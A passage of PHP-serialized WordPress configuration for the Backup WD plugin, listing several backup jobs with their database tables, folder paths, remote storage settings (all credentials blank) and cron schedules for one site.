bl_entries\";s:15:\"wp_ufbl_entries\";s:13:\"wp_ufbl_forms\";s:13:\"wp_ufbl_forms\";s:11:\"wp_usermeta\";s:11:\"wp_usermeta\";s:8:\"wp_users\";s:8:\"wp_users\";s:23:\"wp_woocommerce_api_keys\";s:23:\"wp_woocommerce_api_keys\";s:35:\"wp_woocommerce_attribute_taxonomies\";s:35:\"wp_woocommerce_attribute_taxonomies\";s:47:\"wp_woocommerce_downloadable_product_permissions\";s:47:\"wp_woocommerce_downloadable_product_permissions\";s:18:\"wp_woocommerce_log\";s:18:\"wp_woocommerce_log\";s:29:\"wp_woocommerce_order_itemmeta\";s:29:\"wp_woocommerce_order_itemmeta\";s:26:\"wp_woocommerce_order_items\";s:26:\"wp_woocommerce_order_items\";s:32:\"wp_woocommerce_payment_tokenmeta\";s:32:\"wp_woocommerce_payment_tokenmeta\";s:29:\"wp_woocommerce_payment_tokens\";s:29:\"wp_woocommerce_payment_tokens\";s:23:\"wp_woocommerce_sessions\";s:23:\"wp_woocommerce_sessions\";s:38:\"wp_woocommerce_shipping_zone_locations\";s:38:\"wp_woocommerce_shipping_zone_locations\";s:36:\"wp_woocommerce_shipping_zone_methods\";s:36:\"wp_woocommerce_shipping_zone_methods\";s:29:\"wp_woocommerce_shipping_zones\";s:29:\"wp_woocommerce_shipping_zones\";s:33:\"wp_woocommerce_tax_rate_locations\";s:33:\"wp_woocommerce_tax_rate_locations\";s:24:\"wp_woocommerce_tax_rates\";s:24:\"wp_woocommerce_tax_rates\";s:24:\"wp_wr_contactform_fields\";s:24:\"wp_wr_contactform_fields\";s:28:\"wp_wr_contactform_form_pages\";s:28:\"wp_wr_contactform_form_pages\";s:33:\"wp_wr_contactform_submission_data\";s:33:\"wp_wr_contactform_submission_data\";}s:10:\"dbfilename\";s:12:\"smepubli_wp4\";s:17:\"use_wp_connection\";s:1:\"1\";s:10:\"dbfilecomp\";s:4:\"none\";s:7:\"db_host\";s:0:\"\";s:7:\"db_user\";s:0:\"\";s:11:\"db_password\";s:0:\"\";s:7:\"db_name\";s:0:\"\";s:8:\"bup_root\";a:1:{i:0;s:1:\"1\";}s:11:\"bup_content\";a:1:{i:0;s:1:\"1\";}s:19:\"bup_content_exclude\";s:0:\"\";s:11:\"bup_plugins\";a:1:{i:0;s:1:\"1\";}s:19:\"bup_plugins_exclude\";a:1:{i:0;s:9:\"backup-wd\";}s:10:\"bup_themes\";s:1:\"1\";s:11:\"bup_uploads\";s:1:\"1\";s:17:\"bup_extra_folders\";s:0:\"\";s:19:\"bup_uploads_exclude\";a:3:{i:0;s:21:\"backup-wd-logs-3dd56e\";i:1;s:21:\"backup-wd-temp-3dd56e\";i:2;s:16:\"backup-wd-3dd56e\";}s:20:\"bup_include_specials\";s:1:\"1\";s:13:\"exclude_types\";s:51:\".tmp,.svn,.git,desktop.ini,.DS_Store,/node_modules/\";s:16:\"use_folder_as_wp\";s:1:\"0\";s:10:\"folderpath\";s:46:\"wp-content/uploads/backup-wd-files-{hash_key}/\";s:12:\"folderdelete\";i:15;s:16:\"folderdeletesync\";s:1:\"1\";s:12:\"gdrivefolder\";s:27:\"companyregistration.online/\";s:16:\"gdrivefiledelete\";i:15;s:20:\"gdrivefiledeletesync\";s:1:\"1\";s:9:\"s3service\";s:9:\"us-east-1\";s:11:\"s3accesskey\";s:0:\"\";s:12:\"s3privatekey\";s:0:\"\";s:8:\"s3bucket\";s:0:\"\";s:11:\"s3newbucket\";s:0:\"\";s:14:\"s3bucketfolder\";s:27:\"companyregistration.online/\";s:12:\"s3filedelete\";i:15;s:16:\"s3filedeletesync\";s:1:\"1\";s:13:\"s3multiupload\";s:1:\"1\";s:14:\"s3storageclass\";s:8:\"standard\";s:18:\"s3serverencryption\";s:1:\"1\";s:9:\"dboxtoken\";s:0:\"\";s:8:\"dboxtype\";s:7:\"sandbox\";s:10:\"dboxfolder\";s:27:\"companyregistration.online/\";s:14:\"dboxfiledelete\";i:15;s:18:\"dboxfiledeletesync\";s:1:\"1\";s:9:\"azurename\";s:0:\"\";s:8:\"azurekey\";s:0:\"\";s:12:\"azurenewcont\";s:0:\"\";s:11:\"azurefolder\";s:27:\"companyregistration.online/\";s:15:\"azurefiledelete\";i:15;s:19:\"azurefiledeletesync\";s:1:\"1\";s:7:\"rscuser\";s:0:\"\";s:6:\"rsckey\";s:0:\"\";s:9:\"rscregion\";s:3:\"DFW\";s:12:\"rsccontainer\";s:0:\"\";s:10:\"rscnewcont\";s:0:\"\";s:9:\"rscfolder\";s:27:\"companyregistration.online/\";s:13:\"rscfiledelete\";i:15;s:17:\"rscfiledeletesync\";s:1:\"1\";s:9:\"ftpserver\";s:0:\"\";s:7:\"ftpport\";i:21;s:7:\"ftpuser\";s:0:\"\";s:7:\"ftppass\";s:0:\"\";s:9:\"ftpfolder\";s:27:\"companyregistration.online/\";s:13:\"ftpfiledelete\";i:15;s:10:\"ftptimeout\";i:90;s:6:\"ftpssl\";s:0:\"\";s:8:\"ftppmode\";s:1:\"1\";s:10:\"sugartoken\";s:0:\"\";s:9:\"sugaruser\";s:0:\"\";s:15:\"sugarsyncfolder\";s:0:\"\";s:11:\"sugarfolder\";s:27:\"companyregistration.online/\";s:15:\"sugarfiledelete\";i:15;s:14:\"glacier_region\";s:9:\"us-east-1\";s:17:\"glacier_accesskey\";s:0:\"\";s:18:\"glacier_privatekey\";s:0:\"\";s:16:\"glacier_newvault\";s:0:\"\";s:18:\"glacier_filedelete\";i:15;s:10:\"send_email\";s:0:\"\";s:6:\"job_id\";i:6;s:15:\"cron_expression\";s:9:\"0 0 * * *\";s:12:\"schedulelink\";s:104:\"https://companyregistration.online/wp-cron.php?jobid=2&amp;buwd_cron=1&amp;type=run&amp;_wpnonce=0eb6add\";s:3:\"day\";s:0:\"\";s:11:\"scheduleday\";s:0:\"\";s:12:\"schedulehour\";s:2:\"00\";s:14:\"scheduleminute\";s:2:\"00\";}i:3;a:94:{s:4:\"name\";s:25:\"Plugins and Themes Backup\";s:4:\"type\";a:2:{i:0;s:2:\"db\";i:1;s:5:\"files\";}s:11:\"destination\";a:1:{i:0;s:6:\"folder\";}s:11:\"backup_type\";s:4:\"sync\";s:12:\"archive_name\";s:37:\"backupwd_{hash_key}_%Y-%m-%d_%H-%i-%s\";s:14:\"archive_format\";s:3:\"tar\";s:8:\"schedule\";s:8:\"manually\";s:12:\"scheduletype\";s:5:\"basic\";s:13:\"schedulemonth\";a:13:{i:0;s:3:\"any\";i:1;s:1:\"1\";i:2;s:1:\"2\";i:3;s:1:\"3\";i:4;s:1:\"4\";i:5;s:1:\"5\";i:6;s:1:\"6\";i:7;s:1:\"7\";i:8;s:1:\"8\";i:9;s:1:\"9\";i:10;s:2:\"10\";i:11;s:2:\"11\";i:12;s:2:\"12\";}s:12:\"scheduleweek\";a:1:{i:0;s:1:\"1\";}s:12:\"dbtables_all\";a:0:{}s:8:\"dbtables\";a:56:{s:18:\"wp_cf_form_entries\";s:18:\"wp_cf_form_entries\";s:21:\"wp_cf_form_entry_meta\";s:21:\"wp_cf_form_entry_meta\";s:23:\"wp_cf_form_entry_values\";s:23:\"wp_cf_form_entry_values\";s:11:\"wp_cf_forms\";s:11:\"wp_cf_forms\";s:14:\"wp_cf_tracking\";s:14:\"wp_cf_tracking\";s:19:\"wp_cf_tracking_meta\";s:19:\"wp_cf_tracking_meta\";s:14:\"wp_commentmeta\";s:14:\"wp_commentmeta\";s:11:\"wp_comments\";s:11:\"wp_comments\";s:22:\"wp_duplicator_packages\";s:22:\"wp_duplicator_packages\";s:17:\"wp_et_bloom_stats\";s:17:\"wp_et_bloom_stats\";s:29:\"wp_et_divi_ab_testing_clients\";s:29:\"wp_et_divi_ab_testing_clients\";s:27:\"wp_et_divi_ab_testing_stats\";s:27:\"wp_et_divi_ab_testing_stats\";s:12:\"wp_formmaker\";s:12:\"wp_formmaker\";s:19:\"wp_formmaker_backup\";s:19:\"wp_formmaker_backup\";s:20:\"wp_formmaker_blocked\";s:20:\"wp_formmaker_blocked\";s:28:\"wp_formmaker_display_options\";s:28:\"wp_formmaker_display_options\";s:18:\"wp_formmaker_query\";s:18:\"wp_formmaker_query\";s:21:\"wp_formmaker_sessions\";s:21:\"wp_formmaker_sessions\";s:20:\"wp_formmaker_submits\";s:20:\"wp_formmaker_submits\";s:19:\"wp_formmaker_themes\";s:19:\"wp_formmaker_themes\";s:18:\"wp_formmaker_views\";s:18:\"wp_formmaker_views\";s:8:\"wp_links\";s:8:\"wp_links\";s:25:\"wp_nextend2_image_storage\";s:25:\"wp_nextend2_image_storage\";s:27:\"wp_nextend2_section_storage\";s:27:\"wp_nextend2_section_storage\";s:35:\"wp_nextend2_smartslider3_generators\";s:35:\"wp_nextend2_smartslider3_generators\";s:32:\"wp_nextend2_smartslider3_sliders\";s:32:\"wp_nextend2_smartslider3_sliders\";s:37:\"wp_nextend2_smartslider3_sliders_xref\";s:37:\"wp_nextend2_smartslider3_sliders_xref\";s:31:\"wp_nextend2_smartslider3_slides\";s:31:\"wp_nextend2_smartslider3_slides\";s:10:\"wp_options\";s:10:\"wp_options\";s:11:\"wp_postmeta\";s:11:\"wp_postmeta\";s:8:\"wp_posts\";s:8:\"wp_posts\";s:21:\"wp_term_relationships\";s:21:\"wp_term_relationships\";s:16:\"wp_term_taxonomy\";s:16:\"wp_term_taxonomy\";s:11:\"wp_termmeta\";s:11:\"wp_termmeta\";s:8:\"wp_terms\";s:8:\"wp_terms\";s:15:\"wp_ufbl_entries\";s:15:\"wp_ufbl_entries\";s:13:\"wp_ufbl_forms\";s:13:\"wp_ufbl_forms\";s:11:\"wp_usermeta\";s:11:\"wp_usermeta\";s:8:\"wp_users\";s:8:\"wp_users\";s:23:\"wp_woocommerce_api_keys\";s:23:\"wp_woocommerce_api_keys\";s:35:\"wp_woocommerce_attribute_taxonomies\";s:35:\"wp_woocommerce_attribute_taxonomies\";s:47:\"wp_woocommerce_downloadable_product_permissions\";s:47:\"wp_woocommerce_downloadable_product_permissions\";s:18:\"wp_woocommerce_log\";s:18:\"wp_woocommerce_log\";s:29:\"wp_woocommerce_order_itemmeta\";s:29:\"wp_woocommerce_order_itemmeta\";s:26:\"wp_woocommerce_order_items\";s:26:\"wp_woocommerce_order_items\";s:32:\"wp_woocommerce_payment_tokenmeta\";s:32:\"wp_woocommerce_payment_tokenmeta\";s:29:\"wp_woocommerce_payment_tokens\";s:29:\"wp_woocommerce_payment_tokens\";s:23:\"wp_woocommerce_sessions\";s:23:\"wp_woocommerce_sessions\";s:38:\"wp_woocommerce_shipping_zone_locations\";s:38:\"wp_woocommerce_shipping_zone_locations\";s:36:\"wp_woocommerce_shipping_zone_methods\";s:36:\"wp_woocommerce_shipping_zone_methods\";s:29:\"wp_woocommerce_shipping_zones\";s:29:\"wp_woocommerce_shipping_zones\";s:33:\"wp_woocommerce_tax_rate_locations\";s:33:\"wp_woocommerce_tax_rate_locations\";s:24:\"wp_woocommerce_tax_rates\";s:24:\"wp_woocommerce_tax_rates\";s:24:\"wp_wr_contactform_fields\";s:24:\"wp_wr_contactform_fields\";s:28:\"wp_wr_contactform_form_pages\";s:28:\"wp_wr_contactform_form_pages\";s:33:\"wp_wr_contactform_submission_data\";s:33:\"wp_wr_contactform_submission_data\";}s:10:\"dbfilename\";s:12:\"smepubli_wp4\";s:17:\"use_wp_connection\";s:1:\"1\";s:10:\"dbfilecomp\";s:4:\"none\";s:7:\"db_host\";s:0:\"\";s:7:\"db_user\";s:0:\"\";s:11:\"db_password\";s:0:\"\";s:7:\"db_name\";s:0:\"\";s:8:\"bup_root\";s:0:\"\";s:11:\"bup_content\";s:0:\"\";s:19:\"bup_content_exclude\";s:0:\"\";s:11:\"bup_plugins\";a:1:{i:0;s:1:\"1\";}s:19:\"bup_plugins_exclude\";a:1:{i:0;s:9:\"backup-wd\";}s:10:\"bup_themes\";s:1:\"1\";s:11:\"bup_uploads\";s:0:\"\";s:17:\"bup_extra_folders\";s:0:\"\";s:19:\"bup_uploads_exclude\";a:3:{i:0;s:21:\"backup-wd-logs-3dd56e\";i:1;s:21:\"backup-wd-temp-3dd56e\";i:2;s:16:\"backup-wd-3dd56e\";}s:20:\"bup_include_specials\";s:1:\"1\";s:13:\"exclude_types\";s:51:\".tmp,.svn,.git,desktop.ini,.DS_Store,/node_modules/\";s:16:\"use_folder_as_wp\";s:1:\"0\";s:10:\"folderpath\";s:55:\"wp-content/uploads/backup-wd-plugins-themes-{hash_key}/\";s:12:\"folderdelete\";i:15;s:16:\"folderdeletesync\";s:1:\"1\";s:12:\"gdrivefolder\";s:27:\"companyregistration.online/\";s:16:\"gdrivefiledelete\";i:15;s:20:\"gdrivefiledeletesync\";s:1:\"1\";s:9:\"s3service\";s:9:\"us-east-1\";s:11:\"s3accesskey\";s:0:\"\";s:12:\"s3privatekey\";s:0:\"\";s:8:\"s3bucket\";s:0:\"\";s:11:\"s3newbucket\";s:0:\"\";s:14:\"s3bucketfolder\";s:27:\"companyregistration.online/\";s:12:\"s3filedelete\";i:15;s:16:\"s3filedeletesync\";s:1:\"1\";s:13:\"s3multiupload\";s:1:\"1\";s:14:\"s3storageclass\";s:8:\"standard\";s:18:\"s3serverencryption\";s:1:\"1\";s:9:\"dboxtoken\";s:0:\"\";s:8:\"dboxtype\";s:7:\"sandbox\";s:10:\"dboxfolder\";s:27:\"companyregistration.online/\";s:14:\"dboxfiledelete\";i:15;s:18:\"dboxfiledeletesync\";s:1:\"1\";s:9:\"azurename\";s:0:\"\";s:8:\"azurekey\";s:0:\"\";s:12:\"azurenewcont\";s:0:\"\";s:11:\"azurefolder\";s:27:\"companyregistration.online/\";s:15:\"azurefiledelete\";i:15;s:19:\"azurefiledeletesync\";s:1:\"1\";s:7:\"rscuser\";s:0:\"\";s:6:\"rsckey\";s:0:\"\";s:9:\"rscregion\";s:3:\"DFW\";s:12:\"rsccontainer\";s:0:\"\";s:10:\"rscnewcont\";s:0:\"\";s:9:\"rscfolder\";s:27:\"companyregistration.online/\";s:13:\"rscfiledelete\";i:15;s:17:\"rscfiledeletesync\";s:1:\"1\";s:9:\"ftpserver\";s:0:\"\";s:7:\"ftpport\";i:21;s:7:\"ftpuser\";s:0:\"\";s:7:\"ftppass\";s:0:\"\";s:9:\"ftpfolder\";s:27:\"companyregistration.online/\";s:13:\"ftpfiledelete\";i:15;s:10:\"ftptimeout\";i:90;s:6:\"ftpssl\";s:0:\"\";s:8:\"ftppmode\";s:1:\"1\";s:10:\"sugartoken\";s:0:\"\";s:9:\"sugaruser\";s:0:\"\";s:15:\"sugarsyncfolder\";s:0:\"\";s:11:\"sugarfolder\";s:27:\"companyregistration.online/\";s:15:\"sugarfiledelete\";i:15;s:14:\"glacier_region\";s:9:\"us-east-1\";s:17:\"glacier_accesskey\";s:0:\"\";s:18:\"glacier_privatekey\";s:0:\"\";s:16:\"glacier_newvault\";s:0:\"\";s:18:\"glacier_filedelete\";i:15;s:10:\"send_email\";s:0:\"\";s:6:\"job_id\";i:3;s:15:\"cron_expression\";s:9:\"0 0 * * *\";s:12:\"schedulelink\";s:104:\"https://companyregistration.online/wp-cron.php?jobid=3&amp;buwd_cron=1&amp;type=run&amp;_wpnonce=0eb6add\";s:3:\"day\";s:0:\"\";s:11:\"scheduleday\";s:0:\"\";s:12:\"schedulehour\";s:2:\"00\";s:14:\"scheduleminute\";s:2:\"00\";}i:4;a:94:{s:4:\"name\";s:25:\"Files and Database Backup\";s:4:\"type\";a:2:{i:0;s:2:\"db\";i:1;s:5:\"files\";}s:11:\"destination\";a:1:{i:0;s:6:\"folder\";}s:11:\"backup_type\";s:4:\"sync\";s:12:\"archive_name\";s:37:\"backupwd_{hash_key}_%Y-%m-%d_%H-%i-%s\";s:14:\"archive_format\";s:3:\"tar\";s:8:\"schedule\";s:8:\"manually\";s:12:\"scheduletype\";s:5:\"basic\";s:13:\"schedulemonth\";a:13:{i:0;s:3:\"any\";i:1;s:1:\"1\";i:2;s:1:\"2\";i:3;s:1:\"3\";i:4;s:1:\"4\";i:5;s:1:\"5\";i:6;s:1:\"6\";i:7;s:1:\"7\";i:8;s:1:\"8\";i:9;s:1:\"9\";i:10;s:2:\"10\";i:11;s:2:\"11\";i:12;s:2:\"12\";}s:12:\"scheduleweek\";a:1:{i:0;s:1:\"1\";}s:12:\"dbtables_all\";a:0:{}s:8:\"dbtables\";a:56:{s:18:\"wp_cf_form_entries\";s:18:\"wp_cf_form_entries\";s:21:\"wp_cf_form_entry_meta\";s:21:\"wp_cf_form_entry_meta\";s:23:\"wp_cf_form_entry_values\";s:23:\"wp_cf_form_entry_values\";s:11:\"wp_cf_forms\";s:11:\"wp_cf_forms\";s:14:\"wp_cf_tracking\";s:14:\"wp_cf_tracking\";s:19:\"wp_cf_tracking_meta\";s:19:\"wp_cf_tracking_meta\";s:14:\"wp_commentmeta\";s:14:\"wp_commentmeta\";s:11:\"wp_comments\";s:11:\"wp_comments\";s:22:\"wp_duplicator_packages\";s:22:\"wp_duplicator_packages\";s:17:\"wp_et_bloom_stats\";s:17:\"wp_et_bloom_stats\";s:29:\"wp_et_divi_ab_testing_clients\";s:29:\"wp_et_divi_ab_testing_clients\";s:27:\"wp_et_divi_ab_testing_stats\";s:27:\"wp_et_divi_ab_testing_stats\";s:12:\"wp_formmaker\";s:12:\"wp_formmaker\";s:19:\"wp_formmaker_backup\";s:19:\"wp_formmaker_backup\";s:20:\"wp_formmaker_blocked\";s:20:\"wp_formmaker_blocked\";s:28:\"wp_formmaker_display_options\";s:28:\"wp_formmaker_display_options\";s:18:\"wp_formmaker_query\";s:18:\"wp_formmaker_query\";s:21:\"wp_formmaker_sessions\";s:21:\"wp_formmaker_sessions\";s:20:\"wp_formmaker_submits\";s:20:\"wp_formmaker_submits\";s:19:\"wp_formmaker_themes\";s:19:\"wp_formmaker_themes\";s:18:\"wp_formmaker_views\";s:18:\"wp_formmaker_views\";s:8:\"wp_links\";s:8:\"wp_links\";s:25:\"wp_nextend2_image_storage\";s:25:\"wp_nextend2_image_storage\";s:27:\"wp_nextend2_section_storage\";s:27:\"wp_nextend2_section_storage\";s:35:\"wp_nextend2_smartslider3_generators\";s:35:\"wp_nextend2_smartslider3_generators\";s:32:\"wp_nextend2_smartslider3_sliders\";s:32:\"wp_nextend2_smartslider3_sliders\";s:37:\"wp_nextend2_smartslider3_sliders_xref\";s:37:\"wp_nextend2_smartslider3_sliders_xref\";s:31:\"wp_nextend2_smartslider3_slides\";s:31:\"wp_nextend2_smartslider3_slides\";s:10:\"wp_options\";s:10:\"wp_options\";s:11:\"wp_postmeta\";s:11:\"wp_postmeta\";s:8:\"wp_posts\";s:8:\"wp_posts\";s:21:\"wp_term_relationships\";s:21:\"wp_term_relationships\";s:16:\"wp_term_taxonomy\";s:16:\"wp_term_taxonomy\";s:11:\"wp_termmeta\";s:11:\"wp_termmeta\";s:8:\"wp_terms\";s:8:\"wp_terms\";s:15:\"wp_ufbl_entries\";s:15:\"wp_ufbl_entries\";s:13:\"wp_ufbl_forms\";s:13:\"wp_ufbl_forms\";s:11:\"wp_usermeta\";s:11:\"wp_usermeta\";s:8:\"wp_users\";s:8:\"wp_users\";s:23:\"wp_woocommerce_api_keys\";s:23:\"wp_woocommerce_api_keys\";s:35:\"wp_woocommerce_attribute_taxonomies\";s:35:\"wp_woocommerce_attribute_taxonomies\";s:47:\"wp_woocommerce_downloadable_product_permissions\";s:47:\"wp_woocommerce_downloadable_product_permissions\";s:18:\"wp_woocommerce_log\";s:18:\"wp_woocommerce_log\";s:29:\"wp_woocommerce_order_itemmeta\";s:29:\"wp_woocommerce_order_itemmeta\";s:26:\"wp_woocommerce_order_items\";s:26:\"wp_woocommerce_order_items\";s:32:\"wp_woocommerce_payment_tokenmeta\";s:32:\"wp_woocommerce_payment_tokenmeta\";s:29:\"wp_woocommerce_payment_tokens\";s:29:\"wp_woocommerce_payment_tokens\";s:23:\"wp_woocommerce_sessions\";s:23:\"wp_woocommerce_sessions\";s:38:\"wp_woocommerce_shipping_zone_locations\";s:38:\"wp_woocommerce_shipping_zone_locations\";s:36:\"wp_woocommerce_shipping_zone_methods\";s:36:\"wp_woocommerce_shipping_zone_methods\";s:29:\"wp_woocommerce_shipping_zones\";s:29:\"wp_woocommerce_shipping_zones\";s:33:\"wp_woocommerce_tax_rate_locations\";s:33:\"wp_woocommerce_tax_rate_locations\";s:24:\"wp_woocommerce_tax_rates\";s:24:\"wp_woocommerce_tax_rates\";s:24:\"wp_wr_contactform_fields\";s:24:\"wp_wr_contactform_fields\";s:28:\"wp_wr_contactform_form_pages\";s:28:\"wp_wr_contactform_form_pages\";s:33:\"wp_wr_contactform_submission_data\";s:33:\"wp_wr_contactform_submission_data\";}s:10:\"dbfilename\";s:12:\"smepubli_wp4\";s:17:\"use_wp_connection\";s:1:\"1\";s:10:\"dbfilecomp\";s:4:\"none\";s:7:\"db_host\";s:0:\"\";s:7:\"db_user\";s:0:\"\";s:11:\"db_password\";s:0:\"\";s:7:\"db_name\";s:0:\"\";s:8:\"bup_root\";s:0:\"\";s:11:\"bup_content\";s:1:\"1\";s:19:\"bup_content_exclude\";s:0:\"\";s:11:\"bup_plugins\";a:1:{i:0;s:1:\"1\";}s:19:\"bup_plugins_exclude\";a:1:{i:0;s:9:\"backup-wd\";}s:10:\"bup_themes\";s:1:\"1\";s:11:\"bup_uploads\";s:0:\"\";s:17:\"bup_extra_folders\";s:0:\"\";s:19:\"bup_uploads_exclude\";a:3:{i:0;s:21:\"backup-wd-logs-3dd56e\";i:1;s:21:\"backup-wd-temp-3dd56e\";i:2;s:16:\"backup-wd-3dd56e\";}s:20:\"bup_include_specials\";s:1:\"1\";s:13:\"exclude_types\";s:51:\".tmp,.svn,.git,desktop.ini,.DS_Store,/node_modules/\";s:16:\"use_folder_as_wp\";s:1:\"0\";s:10:\"folderpath\";s:49:\"wp-content/uploads/backup-wd-files-db-{hash_key}/\";s:12:\"folderdelete\";i:15;s:16:\"folderdeletesync\";s:1:\"1\";s:12:\"gdrivefolder\";s:27:\"companyregistration.online/\";s:16:\"gdrivefiledelete\";i:15;s:20:\"gdrivefiledeletesync\";s:1:\"1\";s:9:\"s3service\";s:9:\"us-east-1\";s:11:\"s3accesskey\";s:0:\"\";s:12:\"s3privatekey\";s:0:\"\";s:8:\"s3bucket\";s:0:\"\";s:11:\"s3newbucket\";s:0:\"\";s:14:\"s3bucketfolder\";s:27:\"companyregistration.online/\";s:12:\"s3filedelete\";i:15;s:16:\"s3filedeletesync\";s:1:\"1\";s:13:\"s3multiupload\";s:1:\"1\";s:14:\"s3storageclass\";s:8:\"standard\";s:18:\"s3serverencryption\";s:1:\"1\";s:9:\"dboxtoken\";s:0:\"\";s:8:\"dboxtype\";s:7:\"sandbox\";s:10:\"dboxfolder\";s:27:\"companyregistration.online/\";s:14:\"dboxfiledelete\";i:15;s:18:\"dboxfiledeletesync\";s:1:\"1\";s:9:\"azurename\";s:0:\"\";s:8:\"azurekey\";s:0:\"\";s:12:\"azurenewcont\";s:0:\"\";s:11:\"azurefolder\";s:27:\"companyregistration.online/\";s:15:\"azurefiledelete\";i:15;s:19:\"azurefiledeletesync\";s:1:\"1\";s:7:\"rscuser\";s:0:\"\";s:6:\"rsckey\";s:0:\"\";s:9:\"rscregion\";s:3:\"DFW\";s:12:\"rsccontainer\";s:0:\"\";s:10:\"rscnewcont\";s:0:\"\";s:9:\"rscfolder\";s:27:\"companyregistration.online/\";s:13:\"rscfiledelete\";i:15;s:17:\"rscfiledeletesync\";s:1:\"1\";s:9:\"ftpserver\";s:0:\"\";s:7:\"ftpport\";i:21;s:7:\"ftpuser\";s:0:\"\";s:7:\"ftppass\";s:0:\"\";s:9:\"ftpfolder\";s:27:\"companyregistration.online/\";s:13:\"ftpfiledelete\";i:15;s:10:\"ftptimeout\";i:90;s:6:\"ftpssl\";s:0:\"\";s:8:\"ftppmode\";s:1:\"1\";s:10:\"sugartoken\";s:0:\"\";s:9:\"sugaruser\";s:0:\"\";s:15:\"sugarsyncfolder\";s:0:\"\";s:11:\"sugarfolder\";s:27:\"companyregistration.online/\";s:15:\"sugarfiledelete\";i:15;s:14:\"glacier_region\";s:9:\"us-east-1\";s:17:\"glacier_accesskey\";s:0:\"\";s:18:\"glacier_privatekey\";s:0:\"\";s:16:\"glacier_newvault\";s:0:\"\";s:18:\"glacier_filedelete\";i:15;s:10:\"send_email\";s:0:\"\";s:6:\"job_id\";i:4;s:15:\"cron_expression\";s:9:\"0 0 * * *\";s:12:\"schedulelink\";s:104:\"https://companyregistration.online/wp-cron.php?jobid=4&amp;buwd_cron=1&amp;type=run&amp;_wpnonce=0eb6add\";s:3:\"day\";s:0:\"\";s:11:\"scheduleday\";s:0:\"\";s:12:\"schedulehour\";s:2:\"00\";s:14:\"scheduleminute\";s:2:\"00\";}i:5;a:101:{s:4:\"name\";s:9:\"Backup WD\";s:4:\"type\";a:2:{i:0;s:2:\"db\";i:1;s:5:\"files\";}s:11:\"destination\";a:1:{i:0;s:6:\"folder\";}s:11:\"backup_type\";s:7:\"archive\";s:12:\"archive_name\";s:37:\"backupwd_{hash_key}_%Y-%m-%d_%H-%i-%s\";s:14:\"archive_format\";s:3:\"tar\";s:8:\"schedule\";s:6:\"wpcron\";s:12:\"scheduletype\";s:5:\"basic\";s:13:\"schedulemonth\";a:13:{i:0;s:3:\"any\";i:1;s:1:\"1\";i:2;s:1:\"2\";i:3;s:1:\"3\";i:4;s:1:\"4\";i:5;s:1:\"5\";i:6;s:1:\"6\";i:7;s:1:\"7\";i:8;s:1:\"8\";i:9;s:1:\"9\";i:10;s:2:\"10\";i:11;s:2:\"11\";i:12;s:2:\"12\";}s:12:\"scheduleweek\";a:1:{i:0;s:1:\"1\";}s:8:\"dbtables\";a:56:{i:0;s:18:\"wp_cf_form_entries\";i:1;s:21:\"wp_cf_form_entry_meta\";i:2;s:23:\"wp_cf_form_entry_values\";i:3;s:11:\"wp_cf_forms\";i:4;s:14:\"wp_cf_tracking\";i:5;s:19:\"wp_cf_tracking_meta\";i:6;s:14:\"wp_commentmeta\";i:7;s:11:\"wp_comments\";i:8;s:22:\"wp_duplicator_packages\";i:9;s:17:\"wp_et_bloom_stats\";i:10;s:29:\"wp_et_divi_ab_testing_clients\";i:11;s:27:\"wp_et_divi_ab_testing_stats\";i:12;s:12:\"wp_formmaker\";i:13;s:19:\"wp_formmaker_backup\";i:14;s:20:\"wp_formmaker_blocked\";i:15;s:28:\"wp_formmaker_display_options\";i:16;s:18:\"wp_formmaker_query\";i:17;s:21:\"wp_formmaker_sessions\";i:18;s:20:\"wp_formmaker_submits\";i:19;s:19:\"wp_formmaker_themes\";i:20;s:18:\"wp_formmaker_views\";i:21;s:8:\"wp_links\";i:22;s:25:\"wp_nextend2_image_storage\";i:23;s:27:\"wp_nextend2_section_storage\";i:24;s:35:\"wp_nextend2_smartslider3_generators\";i:25;s:32:\"wp_nextend2_smartslider3_sliders\";i:26;s:37:\"wp_nextend2_smartslider3_sliders_xref\";i:27;s:31:\"wp_nextend2_smartslider3_slides\";i:28;s:10:\"wp_options\";i:29;s:11:\"wp_postmeta\";i:30;s:8:\"wp_posts\";i:31;s:21:\"wp_term_relationships\";i:32;s:16:\"wp_term_taxonomy\";i:33;s:11:\"wp_termmeta\";i:34;s:8:\"wp_terms\";i:35;s:15:\"wp_ufbl_entries\";i:36;s:13:\"wp_ufbl_forms\";i:37;s:11:\"wp_usermeta\";i:38;s:8:\"wp_users\";i:39;s:23:\"wp_woocommerce_api_keys\";i:40;s:35:\"wp_woocommerce_attribute_taxonomies\";i:41;s:47:\"wp_woocommerce_downloadable_product_permissions\";i:42;s:18:\"wp_woocommerce_log\";i:43;s:29:\"wp_woocommerce_order_itemmeta\";i:44;s:26:\"wp_woocommerce_order_items\";i:45;s:32:\"wp_woocommerce_payment_tokenmeta\";i:46;s:29:\"wp_woocommerce_payment_tokens\";i:47;s:23:\"wp_woocommerce_sessions\";i:48;s:38:\"wp_woocommerce_shipping_zone_locations\";i:49;s:36:\"wp_woocommerce_shipping_zone_methods\";i:50;s:29:\"wp_woocommerce_shipping_zones\";i:51;s:33:\"wp_woocommerce_tax_rate_locations\";i:52;s:24:\"wp_woocommerce_tax_rates\";i:53;s:24:\"wp_wr_contactform_fields\";i:54;s:28:\"wp_wr_contactform_form_pages\";i:55;s:33:\"wp_wr_contactform_submission_data\";}s:10:\"dbfilename\";s:12:\"smepubli_wp4\";s:17:\"use_wp_connection\";a:1:{i:0;s:1:\"1\";}s:10:\"dbfilecomp\";s:4:\"gzip\";s:7:\"db_host\";s:0:\"\";s:7:\"db_user\";s:0:\"\";s:11:\"db_password\";s:0:\"\";s:7:\"db_name\";s:12:\"smepubli_wp4\";s:8:\"bup_root\";a:1:{i:0;s:1:\"1\";}s:11:\"bup_content\";a:1:{i:0;s:1:\"1\";}s:19:\"bup_content_exclude\";a:2:{i:0;s:5:\"cache\";i:1;s:7:\"upgrade\";}s:11:\"bup_plugins\";a:1:{i:0;s:1:\"1\";}s:19:\"bup_plugins_exclude\";a:18:{i:0;s:10:\"Anticipate\";i:1;s:9:\"backup-wd\";i:2;s:8:\"backwpup\";i:3;s:13:\"caldera-forms\";i:4;s:11:\"coming-soon\";i:5;s:19:\"divi-100-login-page\";i:6;s:12:\"divi-builder\";i:7;s:10:\"duplicator\";i:8;s:14:\"elegantbuilder\";i:9;s:13:\"et-shortcodes\";i:10;s:20:\"limit-login-attempts\";i:11;s:10:\"notice-bar\";i:12;s:24:\"page-specific-menu-items\";i:13;s:11:\"quick-setup\";i:14;s:18:\"responsive-add-ons\";i:15;s:19:\"shortcodes-ultimate\";i:16;s:14:\"smart-slider-3\";i:17;s:11:\"updraftplus\